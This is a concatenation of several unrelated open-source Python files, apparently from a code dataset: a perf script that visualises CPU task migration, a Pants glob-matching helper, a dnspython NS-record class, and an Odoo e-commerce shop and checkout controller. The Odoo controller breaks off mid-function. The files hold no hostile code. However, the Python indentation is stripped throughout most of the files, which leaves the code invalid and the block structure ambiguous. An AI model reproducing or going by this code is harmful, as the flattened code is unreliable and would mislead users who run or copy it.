# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <[email protected]>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
threads = { 0 : "idle"}
def thread_name(pid):
return "%s:%d" % (threads[pid], pid)
class RunqueueEventUnknown:
@staticmethod
def color():
return None
def __repr__(self):
return "unknown"
class RunqueueEventSleep:
@staticmethod
def color():
return (0, 0, 0xff)
def __init__(self, sleeper):
self.sleeper = sleeper
def __repr__(self):
return "%s gone to sleep" % thread_name(self.sleeper)
class RunqueueEventWakeup:
@staticmethod
def color():
return (0xff, 0xff, 0)
def __init__(self, wakee):
self.wakee = wakee
def __repr__(self):
return "%s woke up" % thread_name(self.wakee)
class RunqueueEventFork:
@staticmethod
def color():
return (0, 0xff, 0)
def __init__(self, child):
self.child = child
def __repr__(self):
return "new forked task %s" % thread_name(self.child)
class RunqueueMigrateIn:
@staticmethod
def color():
return (0, 0xf0, 0xff)
def __init__(self, new):
self.new = new
def __repr__(self):
return "task migrated in %s" % thread_name(self.new)
class RunqueueMigrateOut:
@staticmethod
def color():
return (0xff, 0, 0xff)
def __init__(self, old):
self.old = old
def __repr__(self):
return "task migrated out %s" % thread_name(self.old)
class RunqueueSnapshot:
def __init__(self, tasks = [0], event = RunqueueEventUnknown()):
self.tasks = tuple(tasks)
self.event = event
def sched_switch(self, prev, prev_state, next):
event = RunqueueEventUnknown()
if taskState(prev_state) == "R" and next in self.tasks \
and prev in self.tasks:
return self
if taskState(prev_state) != "R":
event = RunqueueEventSleep(prev)
next_tasks = list(self.tasks[:])
if prev in self.tasks:
if taskState(prev_state) != "R":
next_tasks.remove(prev)
elif taskState(prev_state) == "R":
next_tasks.append(prev)
if next not in next_tasks:
next_tasks.append(next)
return RunqueueSnapshot(next_tasks, event)
def migrate_out(self, old):
if old not in self.tasks:
return self
next_tasks = [task for task in self.tasks if task != old]
return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))
def __migrate_in(self, new, event):
if new in self.tasks:
self.event = event
return self
next_tasks = self.tasks[:] + tuple([new])
return RunqueueSnapshot(next_tasks, event)
def migrate_in(self, new):
return self.__migrate_in(new, RunqueueMigrateIn(new))
def wake_up(self, new):
return self.__migrate_in(new, RunqueueEventWakeup(new))
def wake_up_new(self, new):
return self.__migrate_in(new, RunqueueEventFork(new))
def load(self):
""" Provide the number of tasks on the runqueue.
Don't count idle"""
return len(self.tasks) - 1
def __repr__(self):
ret = self.tasks.__repr__()
ret += self.origin_tostring()
return ret
class TimeSlice:
def __init__(self, start, prev):
self.start = start
self.prev = prev
self.end = start
# cpus that triggered the event
self.event_cpus = []
if prev is not None:
self.total_load = prev.total_load
self.rqs = prev.rqs.copy()
else:
self.rqs = defaultdict(RunqueueSnapshot)
self.total_load = 0
def __update_total_load(self, old_rq, new_rq):
diff = new_rq.load() - old_rq.load()
self.total_load += diff
def sched_switch(self, ts_list, prev, prev_state, next, cpu):
old_rq = self.prev.rqs[cpu]
new_rq = old_rq.sched_switch(prev, prev_state, next)
if old_rq is new_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def migrate(self, ts_list, new, old_cpu, new_cpu):
if old_cpu == new_cpu:
return
old_rq = self.prev.rqs[old_cpu]
out_rq = old_rq.migrate_out(new)
self.rqs[old_cpu] = out_rq
self.__update_total_load(old_rq, out_rq)
new_rq = self.prev.rqs[new_cpu]
in_rq = new_rq.migrate_in(new)
self.rqs[new_cpu] = in_rq
self.__update_total_load(new_rq, in_rq)
ts_list.append(self)
if old_rq is not out_rq:
self.event_cpus.append(old_cpu)
self.event_cpus.append(new_cpu)
def wake_up(self, ts_list, pid, cpu, fork):
old_rq = self.prev.rqs[cpu]
if fork:
new_rq = old_rq.wake_up_new(pid)
else:
new_rq = old_rq.wake_up(pid)
if new_rq is old_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def next(self, t):
self.end = t
return TimeSlice(t, self)
class TimeSliceList(UserList):
def __init__(self, arg = []):
self.data = arg
def get_time_slice(self, ts):
if len(self.data) == 0:
slice = TimeSlice(ts, TimeSlice(-1, None))
else:
slice = self.data[-1].next(ts)
return slice
def find_time_slice(self, ts):
start = 0
end = len(self.data)
found = -1
searching = True
while searching:
if start == end or start == end - 1:
searching = False
i = (end + start) / 2
if self.data[i].start <= ts and self.data[i].end >= ts:
found = i
end = i
continue
if self.data[i].end < ts:
start = i
elif self.data[i].start > ts:
end = i
return found
def set_root_win(self, win):
self.root_win = win
def mouse_down(self, cpu, t):
idx = self.find_time_slice(t)
if idx == -1:
return
ts = self[idx]
rq = ts.rqs[cpu]
raw = "CPU: %d\n" % cpu
raw += "Last event : %s\n" % rq.event.__repr__()
raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
raw += "Load = %d\n" % rq.load()
for t in rq.tasks:
raw += "%s \n" % thread_name(t)
self.root_win.update_summary(raw)
def update_rectangle_cpu(self, slice, cpu):
rq = slice.rqs[cpu]
if slice.total_load != 0:
load_rate = rq.load() / float(slice.total_load)
else:
load_rate = 0
red_power = int(0xff - (0xff * load_rate))
color = (0xff, red_power, red_power)
top_color = None
if cpu in slice.event_cpus:
top_color = rq.event.color()
self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)
def fill_zone(self, start, end):
i = self.find_time_slice(start)
if i == -1:
return
for i in xrange(i, len(self.data)):
timeslice = self.data[i]
if timeslice.start > end:
return
for cpu in timeslice.rqs:
self.update_rectangle_cpu(timeslice, cpu)
def interval(self):
if len(self.data) == 0:
return (0, 0)
return (self.data[0].start, self.data[-1].end)
def nr_rectangles(self):
last_ts = self.data[-1]
max_cpu = 0
for cpu in last_ts.rqs:
if cpu > max_cpu:
max_cpu = cpu
return max_cpu
class SchedEventProxy:
def __init__(self):
self.current_tsk = defaultdict(lambda : -1)
self.timeslices = TimeSliceList()
def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
""" Ensure the task we sched out this cpu is really the one
we logged. Otherwise we may have missed traces """
on_cpu_task = self.current_tsk[headers.cpu]
if on_cpu_task != -1 and on_cpu_task != prev_pid:
print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
(headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)
threads[prev_pid] = prev_comm
threads[next_pid] = next_comm
self.current_tsk[headers.cpu] = next_pid
ts = self.timeslices.get_time_slice(headers.ts())
ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)
def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
ts = self.timeslices.get_time_slice(headers.ts())
ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)
def wake_up(self, headers, comm, pid, success, target_cpu, fork):
if success == 0:
return
ts = self.timeslices.get_time_slice(headers.ts())
ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
global parser
parser = SchedEventProxy()
def trace_end():
app = wx.App(False)
timeslices = parser.timeslices
frame = RootFrame(timeslices, "Migration")
app.MainLoop()
def sched__sched_stat_runtime(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, runtime, vruntime):
pass
def sched__sched_stat_iowait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_sleep(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_process_fork(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
parent_comm, parent_pid, child_comm, child_pid):
pass
def sched__sched_process_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_free(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_migrate_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, orig_cpu,
dest_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.migrate(headers, pid, prio, orig_cpu, dest_cpu)
def sched__sched_switch(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio)
def sched__sched_wakeup_new(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 1)
def sched__sched_wakeup(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 0)
def sched__sched_wait_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
ret):
pass
def sched__sched_kthread_stop(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid):
pass
def trace_unhandled(event_name, context, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
pass
|
gpl-2.0
|
pombredanne/pants
|
src/python/pants/source/filespec.py
|
4
|
1665
|
# coding=utf-8
# Copyright 2017 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import re
def glob_to_regex(pattern):
"""Given a glob pattern, return an equivalent regex expression.
    :param string pattern: The glob pattern. "**" matches 0 or more dirs recursively.
"*" only matches patterns in a single dir.
:returns: A regex string that matches same paths as the input glob does.
"""
out = ['^']
components = pattern.strip('/').replace('.', '[.]').replace('$','[$]').split('/')
doublestar = False
for component in components:
if len(out) == 1:
if pattern.startswith('/'):
out.append('/')
else:
if not doublestar:
out.append('/')
if '**' in component:
if component != '**':
raise ValueError('Invalid usage of "**", use "*" instead.')
if not doublestar:
out.append('(([^/]+/)*)')
doublestar = True
else:
out.append(component.replace('*', '[^/]*'))
doublestar = False
if doublestar:
out.append('[^/]*')
out.append('$')
return ''.join(out)
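# Worked examples, traced by hand from the implementation above (not taken from
# the project's test suite):
#   glob_to_regex('foo/*.py')  -> '^foo/[^/]*[.]py$'
#   glob_to_regex('**/*.java') -> '^(([^/]+/)*)[^/]*[.]java$'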
def globs_matches(path, patterns):
return any(re.match(glob_to_regex(pattern), path) for pattern in patterns)
def matches_filespec(path, spec):
if spec is None:
return False
if not globs_matches(path, spec.get('globs', [])):
return False
for spec in spec.get('exclude', []):
if matches_filespec(path, spec):
return False
return True
|
apache-2.0
|
thekingofkings/focusread
|
libs/dns/rdtypes/nsbase.py
|
18
|
2851
|
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""NS-like base classes."""
from io import BytesIO
import dns.exception
import dns.rdata
import dns.name
class NSBase(dns.rdata.Rdata):
"""Base class for rdata that is like an NS record.
@ivar target: the target name of the rdata
@type target: dns.name.Name object"""
__slots__ = ['target']
def __init__(self, rdclass, rdtype, target):
super(NSBase, self).__init__(rdclass, rdtype)
self.target = target
def to_text(self, origin=None, relativize=True, **kw):
target = self.target.choose_relativity(origin, relativize)
return str(target)
@classmethod
def from_text(cls, rdclass, rdtype, tok, origin=None, relativize=True):
target = tok.get_name()
target = target.choose_relativity(origin, relativize)
tok.get_eol()
return cls(rdclass, rdtype, target)
def to_wire(self, file, compress=None, origin=None):
self.target.to_wire(file, compress, origin)
def to_digestable(self, origin=None):
return self.target.to_digestable(origin)
@classmethod
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin=None):
(target, cused) = dns.name.from_wire(wire[: current + rdlen],
current)
if cused != rdlen:
raise dns.exception.FormError
if origin is not None:
target = target.relativize(origin)
return cls(rdclass, rdtype, target)
def choose_relativity(self, origin=None, relativize=True):
self.target = self.target.choose_relativity(origin, relativize)
class UncompressedNS(NSBase):
"""Base class for rdata that is like an NS record, but whose name
is not compressed when convert to DNS wire format, and whose
digestable form is not downcased."""
def to_wire(self, file, compress=None, origin=None):
super(UncompressedNS, self).to_wire(file, None, origin)
def to_digestable(self, origin=None):
f = BytesIO()
self.to_wire(f, None, origin)
return f.getvalue()
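# For context (an assumption about dnspython's layout, not stated in this file):
# rdata types such as NS, CNAME and PTR subclass NSBase, while DNAME uses
# UncompressedNS so its target name is never compressed on the wire.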
|
mit
|
hanicker/odoo
|
addons/website_sale/controllers/main.py
|
20
|
43301
|
# -*- coding: utf-8 -*-
import werkzeug
from openerp import SUPERUSER_ID
from openerp import http
from openerp.http import request
from openerp.tools.translate import _
from openerp.addons.website.models.website import slug
from openerp.addons.web.controllers.main import login_redirect
PPG = 20 # Products Per Page
PPR = 4 # Products Per Row
class table_compute(object):
def __init__(self):
self.table = {}
def _check_place(self, posx, posy, sizex, sizey):
res = True
for y in range(sizey):
for x in range(sizex):
if posx+x>=PPR:
res = False
break
row = self.table.setdefault(posy+y, {})
if row.setdefault(posx+x) is not None:
res = False
break
for x in range(PPR):
self.table[posy+y].setdefault(x, None)
return res
def process(self, products):
# Compute products positions on the grid
minpos = 0
index = 0
maxy = 0
for p in products:
x = min(max(p.website_size_x, 1), PPR)
y = min(max(p.website_size_y, 1), PPR)
if index>=PPG:
x = y = 1
pos = minpos
while not self._check_place(pos%PPR, pos/PPR, x, y):
pos += 1
# if 21st products (index 20) and the last line is full (PPR products in it), break
# (pos + 1.0) / PPR is the line where the product would be inserted
# maxy is the number of existing lines
# + 1.0 is because pos begins at 0, thus pos 20 is actually the 21st block
# and to force python to not round the division operation
if index >= PPG and ((pos + 1.0) / PPR) > maxy:
break
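                # Worked example (illustrative) with PPG = 20 and PPR = 4:
                # twenty 1x1 products fill rows 0..4, so maxy == 5; the 21st
                # product would land at pos 20 and (20 + 1.0) / 4 == 5.25 > 5,
                # so the loop stops here.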
if x==1 and y==1: # simple heuristic for CPU optimization
minpos = pos/PPR
for y2 in range(y):
for x2 in range(x):
self.table[(pos/PPR)+y2][(pos%PPR)+x2] = False
self.table[pos/PPR][pos%PPR] = {
'product': p, 'x':x, 'y': y,
'class': " ".join(map(lambda x: x.html_class or '', p.website_style_ids))
}
if index<=PPG:
maxy=max(maxy,y+(pos/PPR))
index += 1
# Format table according to HTML needs
rows = self.table.items()
rows.sort()
rows = map(lambda x: x[1], rows)
for col in range(len(rows)):
cols = rows[col].items()
cols.sort()
x += len(cols)
rows[col] = [c for c in map(lambda x: x[1], cols) if c != False]
return rows
# TODO keep with input type hidden
class QueryURL(object):
def __init__(self, path='', **args):
self.path = path
self.args = args
def __call__(self, path=None, **kw):
if not path:
path = self.path
for k,v in self.args.items():
kw.setdefault(k,v)
l = []
for k,v in kw.items():
if v:
if isinstance(v, list) or isinstance(v, set):
l.append(werkzeug.url_encode([(k,i) for i in v]))
else:
l.append(werkzeug.url_encode([(k,v)]))
if l:
path += '?' + '&'.join(l)
return path
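# Illustrative QueryURL usage (the order of the encoded parameters follows dict
# iteration order, so it may vary):
#   keep = QueryURL('/shop', category=3)
#   keep(search='chair')  # -> '/shop?category=3&search=chair'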
def get_pricelist():
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
sale_order = context.get('sale_order')
if sale_order:
pricelist = sale_order.pricelist_id
else:
partner = pool['res.users'].browse(cr, SUPERUSER_ID, uid, context=context).partner_id
pricelist = partner.property_product_pricelist
return pricelist
class website_sale(http.Controller):
def get_pricelist(self):
return get_pricelist()
def get_attribute_value_ids(self, product):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
currency_obj = pool['res.currency']
attribute_value_ids = []
visible_attrs = set(l.attribute_id.id
for l in product.attribute_line_ids
if len(l.value_ids) > 1)
if request.website.pricelist_id.id != context['pricelist']:
website_currency_id = request.website.currency_id.id
currency_id = self.get_pricelist().currency_id.id
for p in product.product_variant_ids:
price = currency_obj.compute(cr, uid, website_currency_id, currency_id, p.lst_price)
attribute_value_ids.append([p.id, [v.id for v in p.attribute_value_ids if v.attribute_id.id in visible_attrs], p.price, price])
else:
attribute_value_ids = [[p.id, [v.id for v in p.attribute_value_ids if v.attribute_id.id in visible_attrs], p.price, p.lst_price]
for p in product.product_variant_ids]
return attribute_value_ids
def _get_search_domain(self, search, category, attrib_values):
domain = request.website.sale_product_domain()
if search:
for srch in search.split(" "):
domain += [
'|', '|', '|', ('name', 'ilike', srch), ('description', 'ilike', srch),
('description_sale', 'ilike', srch), ('product_variant_ids.default_code', 'ilike', srch)]
if category:
domain += [('public_categ_ids', 'child_of', int(category))]
if attrib_values:
attrib = None
ids = []
for value in attrib_values:
if not attrib:
attrib = value[0]
ids.append(value[1])
elif value[0] == attrib:
ids.append(value[1])
else:
domain += [('attribute_line_ids.value_ids', 'in', ids)]
attrib = value[0]
ids = [value[1]]
if attrib:
domain += [('attribute_line_ids.value_ids', 'in', ids)]
return domain
@http.route([
'/shop',
'/shop/page/<int:page>',
'/shop/category/<model("product.public.category"):category>',
'/shop/category/<model("product.public.category"):category>/page/<int:page>'
], type='http', auth="public", website=True)
def shop(self, page=0, category=None, search='', **post):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
attrib_list = request.httprequest.args.getlist('attrib')
attrib_values = [map(int, v.split("-")) for v in attrib_list if v]
attrib_set = set([v[1] for v in attrib_values])
domain = self._get_search_domain(search, category, attrib_values)
keep = QueryURL('/shop', category=category and int(category), search=search, attrib=attrib_list)
if not context.get('pricelist'):
pricelist = self.get_pricelist()
context['pricelist'] = int(pricelist)
else:
pricelist = pool.get('product.pricelist').browse(cr, uid, context['pricelist'], context)
product_obj = pool.get('product.template')
url = "/shop"
product_count = product_obj.search_count(cr, uid, domain, context=context)
if search:
post["search"] = search
if category:
category = pool['product.public.category'].browse(cr, uid, int(category), context=context)
url = "/shop/category/%s" % slug(category)
if attrib_list:
post['attrib'] = attrib_list
pager = request.website.pager(url=url, total=product_count, page=page, step=PPG, scope=7, url_args=post)
product_ids = product_obj.search(cr, uid, domain, limit=PPG, offset=pager['offset'], order='website_published desc, website_sequence desc', context=context)
products = product_obj.browse(cr, uid, product_ids, context=context)
style_obj = pool['product.style']
style_ids = style_obj.search(cr, uid, [], context=context)
styles = style_obj.browse(cr, uid, style_ids, context=context)
category_obj = pool['product.public.category']
category_ids = category_obj.search(cr, uid, [('parent_id', '=', False)], context=context)
categs = category_obj.browse(cr, uid, category_ids, context=context)
attributes_obj = request.registry['product.attribute']
attributes_ids = attributes_obj.search(cr, uid, [], context=context)
attributes = attributes_obj.browse(cr, uid, attributes_ids, context=context)
from_currency = pool.get('product.price.type')._get_field_currency(cr, uid, 'list_price', context)
to_currency = pricelist.currency_id
compute_currency = lambda price: pool['res.currency']._compute(cr, uid, from_currency, to_currency, price, context=context)
values = {
'search': search,
'category': category,
'attrib_values': attrib_values,
'attrib_set': attrib_set,
'pager': pager,
'pricelist': pricelist,
'products': products,
'bins': table_compute().process(products),
'rows': PPR,
'styles': styles,
'categories': categs,
'attributes': attributes,
'compute_currency': compute_currency,
'keep': keep,
'style_in_product': lambda style, product: style.id in [s.id for s in product.website_style_ids],
'attrib_encode': lambda attribs: werkzeug.url_encode([('attrib',i) for i in attribs]),
}
return request.website.render("website_sale.products", values)
@http.route(['/shop/product/<model("product.template"):product>'], type='http', auth="public", website=True)
def product(self, product, category='', search='', **kwargs):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
category_obj = pool['product.public.category']
template_obj = pool['product.template']
context.update(active_id=product.id)
if category:
category = category_obj.browse(cr, uid, int(category), context=context)
category = category if category.exists() else False
attrib_list = request.httprequest.args.getlist('attrib')
attrib_values = [map(int,v.split("-")) for v in attrib_list if v]
attrib_set = set([v[1] for v in attrib_values])
keep = QueryURL('/shop', category=category and category.id, search=search, attrib=attrib_list)
category_ids = category_obj.search(cr, uid, [], context=context)
category_list = category_obj.name_get(cr, uid, category_ids, context=context)
category_list = sorted(category_list, key=lambda category: category[1])
pricelist = self.get_pricelist()
from_currency = pool.get('product.price.type')._get_field_currency(cr, uid, 'list_price', context)
to_currency = pricelist.currency_id
compute_currency = lambda price: pool['res.currency']._compute(cr, uid, from_currency, to_currency, price, context=context)
if not context.get('pricelist'):
context['pricelist'] = int(self.get_pricelist())
product = template_obj.browse(cr, uid, int(product), context=context)
values = {
'search': search,
'category': category,
'pricelist': pricelist,
'attrib_values': attrib_values,
'compute_currency': compute_currency,
'attrib_set': attrib_set,
'keep': keep,
'category_list': category_list,
'main_object': product,
'product': product,
'get_attribute_value_ids': self.get_attribute_value_ids
}
return request.website.render("website_sale.product", values)
@http.route(['/shop/product/comment/<int:product_template_id>'], type='http', auth="public", website=True)
def product_comment(self, product_template_id, **post):
if not request.session.uid:
return login_redirect()
cr, uid, context = request.cr, request.uid, request.context
if post.get('comment'):
request.registry['product.template'].message_post(
cr, uid, product_template_id,
body=post.get('comment'),
type='comment',
subtype='mt_comment',
context=dict(context, mail_create_nosubscribe=True))
return werkzeug.utils.redirect('/shop/product/%s#comments' % product_template_id)
@http.route(['/shop/pricelist'], type='http', auth="public", website=True)
def pricelist(self, promo, **post):
cr, uid, context = request.cr, request.uid, request.context
request.website.sale_get_order(code=promo, context=context)
return request.redirect("/shop/cart")
@http.route(['/shop/cart'], type='http', auth="public", website=True)
def cart(self, **post):
cr, uid, context, pool = request.cr, request.uid, request.context, request.registry
order = request.website.sale_get_order()
if order:
from_currency = pool.get('product.price.type')._get_field_currency(cr, uid, 'list_price', context)
to_currency = order.pricelist_id.currency_id
compute_currency = lambda price: pool['res.currency']._compute(cr, uid, from_currency, to_currency, price, context=context)
else:
compute_currency = lambda price: price
values = {
'order': order,
'compute_currency': compute_currency,
'suggested_products': [],
}
if order:
_order = order
if not context.get('pricelist'):
_order = order.with_context(pricelist=order.pricelist_id.id)
values['suggested_products'] = _order._cart_accessories()
return request.website.render("website_sale.cart", values)
@http.route(['/shop/cart/update'], type='http', auth="public", methods=['POST'], website=True)
def cart_update(self, product_id, add_qty=1, set_qty=0, **kw):
cr, uid, context = request.cr, request.uid, request.context
request.website.sale_get_order(force_create=1)._cart_update(product_id=int(product_id), add_qty=float(add_qty), set_qty=float(set_qty))
return request.redirect("/shop/cart")
@http.route(['/shop/cart/update_json'], type='json', auth="public", methods=['POST'], website=True)
def cart_update_json(self, product_id, line_id, add_qty=None, set_qty=None, display=True):
order = request.website.sale_get_order(force_create=1)
if order.state != 'draft':
request.website.sale_reset()
return {}
value = order._cart_update(product_id=product_id, line_id=line_id, add_qty=add_qty, set_qty=set_qty)
if not order.cart_quantity:
request.website.sale_reset()
return {}
if not display:
return None
value['cart_quantity'] = order.cart_quantity
value['website_sale.total'] = request.website._render("website_sale.total", {
'website_sale_order': request.website.sale_get_order()
})
return value
#------------------------------------------------------
# Checkout
#------------------------------------------------------
def checkout_redirection(self, order):
cr, uid, context, registry = request.cr, request.uid, request.context, request.registry
# must have a draft sale order with lines at this point, otherwise reset
if not order or order.state != 'draft':
request.session['sale_order_id'] = None
request.session['sale_transaction_id'] = None
return request.redirect('/shop')
# if transaction pending / done: redirect to confirmation
tx = context.get('website_sale_transaction')
if tx and tx.state != 'draft':
return request.redirect('/shop/payment/confirmation/%s' % order.id)
def checkout_values(self, data=None):
cr, uid, context, registry = request.cr, request.uid, request.context, request.registry
orm_partner = registry.get('res.partner')
orm_user = registry.get('res.users')
orm_country = registry.get('res.country')
state_orm = registry.get('res.country.state')
country_ids = orm_country.search(cr, SUPERUSER_ID, [], context=context)
countries = orm_country.browse(cr, SUPERUSER_ID, country_ids, context)
states_ids = state_orm.search(cr, SUPERUSER_ID, [], context=context)
states = state_orm.browse(cr, SUPERUSER_ID, states_ids, context)
partner = orm_user.browse(cr, SUPERUSER_ID, request.uid, context).partner_id
order = None
shipping_id = None
shipping_ids = []
checkout = {}
if not data:
if request.uid != request.website.user_id.id:
checkout.update( self.checkout_parse("billing", partner) )
shipping_ids = orm_partner.search(cr, SUPERUSER_ID, [("parent_id", "=", partner.id), ('type', "=", 'delivery')], context=context)
else:
order = request.website.sale_get_order(force_create=1, context=context)
if order.partner_id:
domain = [("partner_id", "=", order.partner_id.id)]
user_ids = request.registry['res.users'].search(cr, SUPERUSER_ID, domain, context=dict(context or {}, active_test=False))
if not user_ids or request.website.user_id.id not in user_ids:
checkout.update( self.checkout_parse("billing", order.partner_id) )
else:
checkout = self.checkout_parse('billing', data)
try:
shipping_id = int(data["shipping_id"])
except ValueError:
pass
if shipping_id == -1:
checkout.update(self.checkout_parse('shipping', data))
if shipping_id is None:
if not order:
order = request.website.sale_get_order(context=context)
if order and order.partner_shipping_id:
shipping_id = order.partner_shipping_id.id
shipping_ids = list(set(shipping_ids) - set([partner.id]))
if shipping_id == partner.id:
shipping_id = 0
elif shipping_id > 0 and shipping_id not in shipping_ids:
shipping_ids.append(shipping_id)
elif shipping_id is None and shipping_ids:
shipping_id = shipping_ids[0]
ctx = dict(context, show_address=1)
shippings = []
if shipping_ids:
shippings = shipping_ids and orm_partner.browse(cr, SUPERUSER_ID, list(shipping_ids), ctx) or []
if shipping_id > 0:
shipping = orm_partner.browse(cr, SUPERUSER_ID, shipping_id, ctx)
checkout.update( self.checkout_parse("shipping", shipping) )
checkout['shipping_id'] = shipping_id
# Default search by user country
if not checkout.get('country_id'):
country_code = request.session['geoip'].get('country_code')
if country_code:
country_ids = request.registry.get('res.country').search(cr, uid, [('code', '=', country_code)], context=context)
if country_ids:
checkout['country_id'] = country_ids[0]
values = {
'countries': countries,
'states': states,
'checkout': checkout,
'shipping_id': partner.id != shipping_id and shipping_id or 0,
'shippings': shippings,
'error': {},
'has_check_vat': hasattr(registry['res.partner'], 'check_vat')
}
return values
mandatory_billing_fields = ["name", "phone", "email", "street2", "city", "country_id"]
optional_billing_fields = ["street", "state_id", "vat", "vat_subjected", "zip"]
mandatory_shipping_fields = ["name", "phone", "street", "city", "country_id"]
optional_shipping_fields = ["state_id", "zip"]
def _get_mandatory_billing_fields(self):
return self.mandatory_billing_fields
def _get_optional_billing_fields(self):
return self.optional_billing_fields
def _get_mandatory_shipping_fields(self):
return self.mandatory_shipping_fields
def _get_optional_shipping_fields(self):
return self.optional_shipping_fields
def _post_prepare_query(self, query, data, address_type):
return query
def checkout_parse(self, address_type, data, remove_prefix=False):
""" data is a dict OR a partner browse record
"""
# set mandatory and optional fields
assert address_type in ('billing', 'shipping')
if address_type == 'billing':
all_fields = self._get_mandatory_billing_fields() + self._get_optional_billing_fields()
prefix = ''
else:
all_fields = self._get_mandatory_shipping_fields() + self._get_optional_shipping_fields()
prefix = 'shipping_'
# set data
if isinstance(data, dict):
query = dict((prefix + field_name, data[prefix + field_name])
for field_name in all_fields if prefix + field_name in data)
else:
query = dict((prefix + field_name, getattr(data, field_name))
for field_name in all_fields if getattr(data, field_name))
if address_type == 'billing' and data.parent_id:
query[prefix + 'street'] = data.parent_id.name
if query.get(prefix + 'state_id'):
query[prefix + 'state_id'] = int(query[prefix + 'state_id'])
if query.get(prefix + 'country_id'):
query[prefix + 'country_id'] = int(query[prefix + 'country_id'])
if query.get(prefix + 'vat'):
query[prefix + 'vat_subjected'] = True
query = self._post_prepare_query(query, data, address_type)
if not remove_prefix:
return query
return dict((field_name, data[prefix + field_name]) for field_name in all_fields if prefix + field_name in data)
def checkout_form_validate(self, data):
cr, uid, context, registry = request.cr, request.uid, request.context, request.registry
# Validation
error = dict()
for field_name in self._get_mandatory_billing_fields():
if not data.get(field_name):
error[field_name] = 'missing'
if data.get("vat") and hasattr(registry["res.partner"], "check_vat"):
if request.website.company_id.vat_check_vies:
# force full VIES online check
check_func = registry["res.partner"].vies_vat_check
else:
# quick and partial off-line checksum validation
check_func = registry["res.partner"].simple_vat_check
